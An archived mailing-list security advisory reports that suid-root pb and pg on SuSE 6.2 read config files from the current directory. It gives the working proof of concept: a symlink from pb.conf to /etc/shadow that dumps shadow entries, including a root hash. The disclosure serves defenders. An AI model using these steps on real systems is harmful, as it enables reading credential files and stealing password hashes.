Greetings, /usr/bin/pb and /usr/bin/pg, suid root by default on SuSE 6.2, allow any user to read any file on the system as shown: susebox:/root # ls -la /usr/bin/pb uname -rwsr-xr-x 1 root root 23544 Jul 22 20:07 /usr/bin/pb susebox:/root # strace /usr/bin/pb ... personality(PER_LINUX) = 0 getpid() = 16623 brk(0) = 0x805032c brk(0x80504cc) = 0x80504cc brk(0x8051000) = 0x8051000 open("pb.conf", O_RDONLY) <-- trouble? = -1 ENOENT (No such file or directory) write(2, "pb.conf fopen: No such file or d"..., 41pb.conf fopen: No such file or directory ) = 41 _exit(1) = ? susebox:/root # --- xnec@susebox:/tmp > id uid=1001(xnec) gid=100(users) groups=100(users) xnec@susebox:/tmp > ln -s /etc/shadow ./pb.conf xnec@susebox:/tmp > pb Unknown config line : <root:nfpzNvX19GwRg:10850:0:10000::::> = <bin:*:8902:0:10000::::> Unknown config line : <daemon:*:8902:0:10000::::> = <lp:*:9473:0:10000::::> Unknown config line : <news:*:8902:0:10000::::> = <uucp:*:0:0:10000::::> Unknown config line : <games:*:0:0:10000::::> = <man:*:8902:0:10000::::> ... etc for the entire shadow file The same scenario for /usr/bin/pg's pg.conf in your cwd. These two programs also contain numerous buffer overflows and other insecure file i/o and should obviously lose their suid bits. They cannot operate correctly without their s-bits unless they are run by root, but no one besides root will run them anyway. These programs are not worth patching. Brock Tellier UNIX Systems Administrator Webley Systems www.webley.com
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:04:22 PDT